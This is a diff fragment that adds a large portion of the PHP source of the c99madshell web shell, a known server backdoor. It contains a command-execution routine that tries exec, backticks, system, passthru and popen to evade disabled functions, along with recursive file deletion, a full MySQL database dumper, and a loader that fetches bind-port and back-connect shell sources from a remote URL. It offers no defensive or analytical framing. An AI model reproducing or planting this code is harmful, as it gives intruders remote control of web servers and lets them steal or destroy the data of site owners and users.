+ | if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://securityprobe.net\">c99madshell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} | ||
+ | if (!empty($login)) | ||
+ | { | ||
+ | if (empty($md5_pass)) {$md5_pass = md5($pass);} | ||
+ | if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) | ||
+ | { | ||
+ | if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));} | ||
+ | header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); | ||
+ | header("HTTP/1.0 401 Unauthorized"); | ||
+ | exit($accessdeniedmess); | ||
+ | } | ||
+ | } | ||
+ | |||
+ | if (isset($_POST['act'])) $act = $_POST['act']; | ||
+ | if (isset($_POST['d'])) $d = urldecode($_POST['d']); | ||
+ | if (isset($_POST['sort'])) $sort = $_POST['sort']; | ||
+ | if (isset($_POST['f'])) $f = $_POST['f']; | ||
+ | if (isset($_POST['ft'])) $ft = $_POST['ft']; | ||
+ | if (isset($_POST['grep'])) $grep = $_POST['grep']; | ||
+ | if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort']; | ||
+ | if (isset($_POST['pid'])) $pid = $_POST['pid']; | ||
+ | if (isset($_POST['sig'])) $sig = $_POST['sig']; | ||
+ | if (isset($_POST['base64'])) $base64 = $_POST['base64']; | ||
+ | if (isset($_POST['fullhexdump'])) $fullhexdump = $_POST['fullhexdump']; | ||
+ | if (isset($_POST['c'])) $c = $_POST['c']; | ||
+ | if (isset($_POST['white'])) $white = $_POST['white']; | ||
+ | if (isset($_POST['nixpasswd'])) $nixpasswd = $_POST['nixpasswd']; | ||
+ | |||
+ | $lastdir = realpath("."); | ||
+ | chdir($curdir); | ||
+ | $sess_data = unserialize($_COOKIE["$sess_cookie"]); | ||
+ | if (!is_array($sess_data)) {$sess_data = array();} | ||
+ | if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} | ||
+ | if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} | ||
+ | |||
+ | $disablefunc = @ini_get("disable_functions"); | ||
+ | if (!empty($disablefunc)) | ||
+ | { | ||
+ | $disablefunc = str_replace(" ","",$disablefunc); | ||
+ | $disablefunc = explode(",",$disablefunc); | ||
+ | } | ||
+ | |||
+ | if (!function_exists("c99_buff_prepare")) | ||
+ | { | ||
+ | function c99_buff_prepare() | ||
+ | { | ||
+ | global $sess_data; | ||
+ | global $act; | ||
+ | foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} | ||
+ | foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} | ||
+ | $sess_data["copy"] = array_unique($sess_data["copy"]); | ||
+ | $sess_data["cut"] = array_unique($sess_data["cut"]); | ||
+ | sort($sess_data["copy"]); | ||
+ | sort($sess_data["cut"]); | ||
+ | if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} | ||
+ | else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} | ||
+ | } | ||
+ | } | ||
+ | c99_buff_prepare(); | ||
+ | if (!function_exists("c99_sess_put")) | ||
+ | { | ||
+ | function c99_sess_put($data) | ||
+ | { | ||
+ | global $sess_cookie; | ||
+ | global $sess_data; | ||
+ | c99_buff_prepare(); | ||
+ | $sess_data = $data; | ||
+ | $data = serialize($data); | ||
+ | setcookie($sess_cookie,$data); | ||
+ | } | ||
+ | } | ||
+ | foreach (array("sort","sql_sort") as $v) | ||
+ | { | ||
+ | if (!empty($_POST[$v])) {$$v = $_POST[$v];} | ||
+ | } | ||
+ | if ($sort_save) | ||
+ | { | ||
+ | if (!empty($sort)) {setcookie("sort",$sort);} | ||
+ | if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} | ||
+ | } | ||
+ | if (!function_exists("str2mini")) | ||
+ | { | ||
+ | function str2mini($content,$len) | ||
+ | { | ||
+ | if (strlen($content) > $len) | ||
+ | { | ||
+ | $len = ceil($len/2) - 2; | ||
+ | return substr($content, 0,$len)."...".substr($content,-$len); | ||
+ | } | ||
+ | else {return $content;} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("view_size")) | ||
+ | { | ||
+ | function view_size($size) | ||
+ | { | ||
+ | if (!is_numeric($size)) {return FALSE;} | ||
+ | else | ||
+ | { | ||
+ | if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} | ||
+ | elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} | ||
+ | elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} | ||
+ | else {$size = $size . " B";} | ||
+ | return $size; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("fs_copy_dir")) | ||
+ | { | ||
+ | function fs_copy_dir($d,$t) | ||
+ | { | ||
+ | $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | ||
+ | if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | ||
+ | $h = opendir($d); | ||
+ | while (($o = readdir($h)) !== FALSE) | ||
+ | { | ||
+ | if (($o != ".") and ($o != "..")) | ||
+ | { | ||
+ | if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | ||
+ | else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | ||
+ | if (!$ret) {return $ret;} | ||
+ | } | ||
+ | } | ||
+ | closedir($h); | ||
+ | return TRUE; | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("fs_copy_obj")) | ||
+ | { | ||
+ | function fs_copy_obj($d,$t) | ||
+ | { | ||
+ | $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | ||
+ | $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); | ||
+ | if (!is_dir(dirname($t))) {mkdir(dirname($t));} | ||
+ | if (is_dir($d)) | ||
+ | { | ||
+ | if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | ||
+ | if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} | ||
+ | return fs_copy_dir($d,$t); | ||
+ | } | ||
+ | elseif (is_file($d)) {return copy($d,$t);} | ||
+ | else {return FALSE;} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("fs_move_dir")) | ||
+ | { | ||
+ | function fs_move_dir($d,$t) | ||
+ | { | ||
+ | $h = opendir($d); | ||
+ | if (!is_dir($t)) {mkdir($t);} | ||
+ | while (($o = readdir($h)) !== FALSE) | ||
+ | { | ||
+ | if (($o != ".") and ($o != "..")) | ||
+ | { | ||
+ | $ret = TRUE; | ||
+ | if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | ||
+ | else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} | ||
+ | if (!$ret) {return $ret;} | ||
+ | } | ||
+ | } | ||
+ | closedir($h); | ||
+ | return TRUE; | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("fs_move_obj")) | ||
+ | { | ||
+ | function fs_move_obj($d,$t) | ||
+ | { | ||
+ | $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | ||
+ | $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); | ||
+ | if (is_dir($d)) | ||
+ | { | ||
+ | if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | ||
+ | if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} | ||
+ | return fs_move_dir($d,$t); | ||
+ | } | ||
+ | elseif (is_file($d)) | ||
+ | { | ||
+ | if(copy($d,$t)) {return unlink($d);} | ||
+ | else {unlink($t); return FALSE;} | ||
+ | } | ||
+ | else {return FALSE;} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("fs_rmdir")) | ||
+ | { | ||
+ | function fs_rmdir($d) | ||
+ | { | ||
+ | $h = opendir($d); | ||
+ | while (($o = readdir($h)) !== FALSE) | ||
+ | { | ||
+ | if (($o != ".") and ($o != "..")) | ||
+ | { | ||
+ | if (!is_dir($d.$o)) {unlink($d.$o);} | ||
+ | else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} | ||
+ | } | ||
+ | } | ||
+ | closedir($h); | ||
+ | rmdir($d); | ||
+ | return !is_dir($d); | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("fs_rmobj")) | ||
+ | { | ||
+ | function fs_rmobj($o) | ||
+ | { | ||
+ | $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); | ||
+ | if (is_dir($o)) | ||
+ | { | ||
+ | if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} | ||
+ | return fs_rmdir($o); | ||
+ | } | ||
+ | elseif (is_file($o)) {return unlink($o);} | ||
+ | else {return FALSE;} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("myshellexec")) | ||
+ | { | ||
+ | function myshellexec($cmd) | ||
+ | { | ||
+ | global $disablefunc; | ||
+ | $result = ""; | ||
+ | if (!empty($cmd)) | ||
+ | { | ||
+ | if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} | ||
+ | elseif (($result = `$cmd`) !== FALSE) {} | ||
+ | elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} | ||
+ | elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} | ||
+ | elseif (is_resource($fp = popen($cmd,"r"))) | ||
+ | { | ||
+ | $result = ""; | ||
+ | while(!feof($fp)) {$result .= fread($fp,1024);} | ||
+ | pclose($fp); | ||
+ | } | ||
+ | } | ||
+ | return $result; | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} | ||
+ | if (!function_exists("view_perms")) | ||
+ | { | ||
+ | function view_perms($mode) | ||
+ | { | ||
+ | if (($mode & 0xC000) === 0xC000) {$type = "s";} | ||
+ | elseif (($mode & 0x4000) === 0x4000) {$type = "d";} | ||
+ | elseif (($mode & 0xA000) === 0xA000) {$type = "l";} | ||
+ | elseif (($mode & 0x8000) === 0x8000) {$type = "-";} | ||
+ | elseif (($mode & 0x6000) === 0x6000) {$type = "b";} | ||
+ | elseif (($mode & 0x2000) === 0x2000) {$type = "c";} | ||
+ | elseif (($mode & 0x1000) === 0x1000) {$type = "p";} | ||
+ | else {$type = "?";} | ||
+ | |||
+ | $owner["read"] = ($mode & 00400)?"r":"-"; | ||
+ | $owner["write"] = ($mode & 00200)?"w":"-"; | ||
+ | $owner["execute"] = ($mode & 00100)?"x":"-"; | ||
+ | $group["read"] = ($mode & 00040)?"r":"-"; | ||
+ | $group["write"] = ($mode & 00020)?"w":"-"; | ||
+ | $group["execute"] = ($mode & 00010)?"x":"-"; | ||
+ | $world["read"] = ($mode & 00004)?"r":"-"; | ||
+ | $world["write"] = ($mode & 00002)? "w":"-"; | ||
+ | $world["execute"] = ($mode & 00001)?"x":"-"; | ||
+ | |||
+ | if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} | ||
+ | if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} | ||
+ | if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} | ||
+ | |||
+ | return $type.join("",$owner).join("",$group).join("",$world); | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} | ||
+ | if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} | ||
+ | if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} | ||
+ | if (!function_exists("parse_perms")) | ||
+ | { | ||
+ | function parse_perms($mode) | ||
+ | { | ||
+ | if (($mode & 0xC000) === 0xC000) {$t = "s";} | ||
+ | elseif (($mode & 0x4000) === 0x4000) {$t = "d";} | ||
+ | elseif (($mode & 0xA000) === 0xA000) {$t = "l";} | ||
+ | elseif (($mode & 0x8000) === 0x8000) {$t = "-";} | ||
+ | elseif (($mode & 0x6000) === 0x6000) {$t = "b";} | ||
+ | elseif (($mode & 0x2000) === 0x2000) {$t = "c";} | ||
+ | elseif (($mode & 0x1000) === 0x1000) {$t = "p";} | ||
+ | else {$t = "?";} | ||
+ | $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; | ||
+ | $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; | ||
+ | $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; | ||
+ | return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("parsesort")) | ||
+ | { | ||
+ | function parsesort($sort) | ||
+ | { | ||
+ | $one = intval($sort); | ||
+ | $second = substr($sort,-1); | ||
+ | if ($second != "d") {$second = "a";} | ||
+ | return array($one,$second); | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("view_perms_color")) | ||
+ | { | ||
+ | function view_perms_color($o) | ||
+ | { | ||
+ | if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} | ||
+ | elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} | ||
+ | else {return "<font color=green>".view_perms(fileperms($o))."</font>";} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("c99getsource")) | ||
+ | { | ||
+ | function c99getsource($fn) | ||
+ | { | ||
+ | global $c99sh_sourcesurl; | ||
+ | $array = array( | ||
+ | "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", | ||
+ | "c99sh_bindport.c" => "c99sh_bindport_c.txt", | ||
+ | "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", | ||
+ | "c99sh_backconn.c" => "c99sh_backconn_c.txt", | ||
+ | "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", | ||
+ | "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", | ||
+ | ); | ||
+ | $name = $array[$fn]; | ||
+ | if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} | ||
+ | else {return FALSE;} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("mysql_dump")) | ||
+ | { | ||
+ | function mysql_dump($set) | ||
+ | { | ||
+ | global $shver; | ||
+ | $sock = $set["sock"]; | ||
+ | $db = $set["db"]; | ||
+ | $print = $set["print"]; | ||
+ | $nl2br = $set["nl2br"]; | ||
+ | $file = $set["file"]; | ||
+ | $add_drop = $set["add_drop"]; | ||
+ | $tabs = $set["tabs"]; | ||
+ | $onlytabs = $set["onlytabs"]; | ||
+ | $ret = array(); | ||
+ | $ret["err"] = array(); | ||
+ | if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} | ||
+ | if (empty($db)) {$db = "db";} | ||
+ | if (empty($print)) {$print = 0;} | ||
+ | if (empty($nl2br)) {$nl2br = 0;} | ||
+ | if (empty($add_drop)) {$add_drop = TRUE;} | ||
+ | if (empty($file)) | ||
+ | { | ||
+ | $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; | ||
+ | } | ||
+ | if (!is_array($tabs)) {$tabs = array();} | ||
+ | if (empty($add_drop)) {$add_drop = TRUE;} | ||
+ | if (sizeof($tabs) == 0) | ||
+ | { | ||
+ | // retrive tables-list | ||
+ | $res = mysql_query("SHOW TABLES FROM ".$db, $sock); | ||
+ | if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} | ||
+ | } | ||
+ | $out = "# Dumped by C99madShell.SQL v. ".$shver." | ||
+ | # Home page: http://securityprobe.net | ||
+ | # | ||
+ | # Host settings: | ||
+ | # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." | ||
+ | # Date: ".date("d.m.Y H:i:s")." | ||
+ | # DB: \"".$db."\" | ||
+ | #--------------------------------------------------------- | ||
+ | "; | ||
+ | $c = count($onlytabs); | ||
+ | foreach($tabs as $tab) | ||
+ | { | ||
+ | if ((in_array($tab,$onlytabs)) or (!$c)) | ||
+ | { | ||
+ | if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} | ||
+ | // recieve query for create table structure | ||
+ | $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); | ||
+ | if (!$res) {$ret["err"][] = mysql_smarterror();} | ||
+ | else | ||
+ | { | ||
+ | $row = mysql_fetch_row($res); | ||
+ | $out .= $row["1"].";\n\n"; | ||
+ | // recieve table variables | ||
+ | $res = mysql_query("SELECT * FROM `$tab`", $sock); | ||
+ | if (mysql_num_rows($res) > 0) | ||
+ | { | ||
+ | while ($row = mysql_fetch_assoc($res)) | ||
+ | { | ||
+ | $keys = implode("`, `", array_keys($row)); | ||
+ | $values = array_values($row); | ||
+ | foreach($values as $k=>$v) {$values[$k] = addslashes($v);} | ||
+ | $values = implode("', '", $values); | ||
+ | $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; | ||
+ | $out .= $sql; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | $out .= "#---------------------------------------------------------------------------------\n\n"; | ||
+ | if ($file) | ||
+ | { | ||
+ | $fp = fopen($file, "w"); | ||
+ | if (!$fp) {$ret["err"][] = 2;} | ||
+ | else | ||
+ | { | ||
+ | fwrite ($fp, $out); | ||
+ | fclose ($fp); | ||
+ | } | ||
+ | } | ||
+ | if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} | ||
+ | return $out; | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("mysql_buildwhere")) | ||
+ | { | ||
+ | function mysql_buildwhere($array,$sep=" and",$functs=array()) | ||
+ | { | ||
+ | if (!is_array($array)) {$array = array();} | ||
+ | $result = ""; | ||
+ | foreach($array as $k=>$v) | ||
+ | { | ||
+ | $value = ""; | ||
+ | if (!empty($functs[$k])) {$value .= $functs[$k]."(";} | ||
+ | $value .= "'".addslashes($v)."'"; | ||
+ | if (!empty($functs[$k])) {$value .= ")";} | ||
+ | $result .= "`".$k."` = ".$value.$sep; | ||
+ | } | ||
+ | $result = substr($result,0,strlen($result)-strlen($sep)); | ||
+ | return $result; | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("mysql_fetch_all")) | ||
+ | { | ||
+ | function mysql_fetch_all($query,$sock) | ||
+ | { | ||
+ | if ($sock) {$result = mysql_query($query,$sock);} | ||
+ | else {$result = mysql_query($query);} | ||
+ | $array = array(); | ||
+ | while ($row = mysql_fetch_array($result)) {$array[] = $row;} | ||
+ | mysql_free_result($result); | ||
+ | return $array; | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("mysql_smarterror")) | ||
+ | { | ||
+ | function mysql_smarterror($type,$sock) | ||
+ | { | ||
+ | if ($sock) {$error = mysql_error($sock);} | ||
+ | else {$error = mysql_error();} | ||
+ | $error = htmlspecialchars($error); | ||
+ | return $error; | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("mysql_query_form")) | ||
+ | { | ||
+ | function mysql_query_form() | ||
+ | { | ||
+ | global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; | ||
+ | $sql_query = urldecode($sql_query); | ||
+ | if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} | ||
+ | if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} | ||
+ | if ((!$submit) or ($sql_act)) | ||
+ | { | ||
+ | echo "<table border=0><tr><td><form method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>"; | ||
+ | if ($tbl_struct) | ||
+ | { | ||
+ | echo "<td valign=\"top\"><b>Fields:</b><br>"; | ||
+ | foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} | ||
+ | echo "</td></tr></table>"; | ||
+ | } | ||
+ | } | ||
+ | if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("mysql_create_db")) | ||
+ | { | ||
+ | function mysql_create_db($db,$sock="") | ||
+ | { | ||
+ | $sql = "CREATE DATABASE `".addslashes($db)."`;"; | ||
+ | if ($sock) {return mysql_query($sql,$sock);} | ||
+ | else {return mysql_query($sql);} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("mysql_query_parse")) | ||
+ | { | ||
+ | function mysql_query_parse($query) | ||
+ | { | ||
+ | $query = trim($query); | ||
+ | $arr = explode (" ",$query); | ||
+ | /*array array() | ||
+ | { | ||
+ | "METHOD"=>array(output_type), | ||
+ | "METHOD1"... | ||
+ | ... | ||
+ | } | ||
+ | if output_type == 0, no output, | ||
+ | if output_type == 1, no output if no error | ||
+ | if output_type == 2, output without control-buttons | ||
+ | if output_type == 3, output with control-buttons | ||
+ | */ | ||
+ | $types = array( | ||
+ | "SELECT"=>array(3,1), | ||
+ | "SHOW"=>array(2,1), | ||
+ | "DELETE"=>array(1), | ||
+ | "DROP"=>array(1) | ||
+ | ); | ||
+ | $result = array(); | ||
+ | $op = strtoupper($arr[0]); | ||
+ | if (is_array($types[$op])) | ||
+ | { | ||
+ | $result["propertions"] = $types[$op]; | ||
+ | $result["query"] = $query; | ||
+ | if ($types[$op] == 2) | ||
+ | { | ||
+ | foreach($arr as $k=>$v) | ||
+ | { | ||
+ | if (strtoupper($v) == "LIMIT") | ||
+ | { | ||
+ | $result["limit"] = $arr[$k+1]; | ||
+ | $result["limit"] = explode(",",$result["limit"]); | ||
+ | if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} | ||
+ | unset($arr[$k],$arr[$k+1]); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | else {return FALSE;} | ||
+ | } | ||
+ | } | ||
+ | if (!function_exists("c99fsearch")) | ||
+ | { | ||
+ | function c99fsearch($d) | ||
+ | { | ||
+ | global $found; | ||
+ | global $found_d; | ||
+ | global $found_f; | ||
+ | global $search_i_f; | ||
+ | global $search_i_d; | ||
+ | global $a; | ||
+ | if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | ||
+ | $h = opendir($d); | ||
+ | while (($f = readdir($h)) !== FALSE) | ||
+ | { | ||
+ | if($f != "." && $f != "..") | ||
+ | { | ||
+ | $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); | ||
+ | if (is_dir($d.$f)) | ||
+ | { | ||
+ | $search_i_d++; | ||
+ | if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} | ||
+ | if (!is_link($d.$f)) {c99fsearch($d.$f);} | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $search_i_f++; | ||
+ | if ($bool) | ||
+ | { | ||
+ | if (!empty($a["text"])) | ||
+ | { | ||
+ | $r = @file_get_contents($d.$f); | ||
+ | if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} | ||
+ | if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} | ||
+ | if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} | ||
+ | else {$bool = strpos(" ".$r,$a["text"],1);} | ||
+ | if ($a["text_not"]) {$bool = !$bool;} | ||
+ | if ($bool) {$found[] = $d.$f; $found_f++;} | ||
+ | } | ||
+ | else {$found[] = $d.$f; $found_f++;} | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | closedir($h); | ||
+ | } | ||
+ | } | ||
+ | if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} | ||
+ | //Sending headers | ||
+ | @ob_start(); | ||
+ | @ob_implicit_flush(0); | ||
+ | function onphpshutdown() | ||
+ | { | ||
+ | global $gzipencode,$ft; | ||
+ | if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) | ||
+ | { | ||
+ | $v = @ob_get_contents(); | ||
+ | @ob_end_clean(); | ||
+ | @ob_start("ob_gzHandler"); | ||
+ | echo $v; | ||
+ | @ob_end_flush(); | ||
+ | } | ||
+ | } | ||
+ | function c99shexit() | ||
+ | { | ||
+ | onphpshutdown(); | ||
+ | exit; | ||
+ | } | ||
+ | header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); | ||
+ | header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); | ||
+ | header("Cache-Control: no-store, no-cache, must-revalidate"); | ||
+ | header("Cache-Control: post-check=0, pre-check=0", FALSE); | ||
+ | header("Pragma: no-cache"); | ||
+ | if (empty($tmpdir)) | ||
+ | { | ||
+ | $tmpdir = ini_get("upload_tmp_dir"); | ||
+ | if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} | ||
+ | } | ||
+ | $tmpdir = realpath($tmpdir); | ||
+ | $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); | ||
+ | if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} | ||
+ | if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} | ||
+ | else {$tmpdir_logs = realpath($tmpdir_logs);} | ||
+ | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") | ||
+ | { | ||
+ | $safemode = TRUE; | ||
+ | $hsafemode = "<font color=red>ON (secure)</font>"; | ||
+ | } | ||
+ | else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} | ||
+ | $v = @ini_get("open_basedir"); | ||
+ | if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} | ||
+ | else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} | ||
+ | $sort = htmlspecialchars($sort); | ||
+ | if (empty($sort)) {$sort = $sort_default;} | ||
+ | $sort[1] = strtolower($sort[1]); | ||
+ | $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); | ||
+ | if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} | ||
+ | $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"#\" onclick=\"document.todo.act.value='phpinfo';document.todo.submit();\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); | ||
+ | @ini_set("highlight.bg",$highlight_bg); //FFFFFF | ||
+ | @ini_set("highlight.comment",$highlight_comment); //#FF8000 | ||
+ | @ini_set("highlight.default",$highlight_default); //#0000BB | ||
+ | @ini_set("highlight.html",$highlight_html); //#000000 | ||
+ | @ini_set("highlight.keyword",$highlight_keyword); //#007700 | ||
+ | @ini_set("highlight.string",$highlight_string); //#DD0000 | ||
+ | if (!is_array($actbox)) {$actbox = array();} | ||
+ | $dspact = $act = htmlspecialchars($act); | ||
+ | $disp_fullpath = $ls_arr = $notls = null; | ||
+ | $ud = urlencode($d); | ||
